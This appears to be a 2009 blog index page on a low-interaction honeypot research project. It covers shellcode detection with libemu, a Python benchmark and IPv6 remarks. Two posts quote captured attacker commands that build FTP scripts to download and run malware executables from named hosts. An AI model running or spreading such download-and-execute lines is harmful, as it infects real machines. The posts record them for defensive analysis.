Home

markus.koetter's blog

Iteolih: Miles and More

Tue, 08/11/2009 - 12:10 — markus.koetter

We got a new milestone due:
10.08.2009

  • thread-pool works
  • stream recording works
  • shellcode detection using libemu works
  • shellcode emulation using libemu works
  • compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.

Iteolih: malicious ftp services

Sun, 07/26/2009 - 13:28 — markus.koetter

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

Iteolih: If you can't touch it ...

Tue, 07/21/2009 - 13:17 — markus.koetter

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Iteolih: Is this worth your time?

Fri, 06/05/2009 - 22:37 — markus.koetter

Hello,
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

Iteolih: Python Benchmark

Sun, 05/24/2009 - 16:57 — markus.koetter

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
I tested

  • 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
  • 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
  • 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

ipv6 local-link scope is a mess

Mon, 10/20/2008 - 16:30 — markus.koetter

I've been looking on ipv6 lately, and even though I got a global /64 for free from he.net, I'm not that amused about ipv6 yet.

Content formatting for beginners

Mon, 08/11/2008 - 14:51 — markus.koetter
  • Allowed HTML tags:
    <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Embedding preformatted code, such as sourcecode:
    <code lang=text|php|c|cpp|java|mysql|...> <//code>

    if no lang is provided, rendering uses lang=text.
    If lang is given, the code will be highlighted.

    example

    int main(int argc, const char *argv[])
    {
         return foo(argc-1,argv+1);
    }
  • Embedding Images:
Syndicate content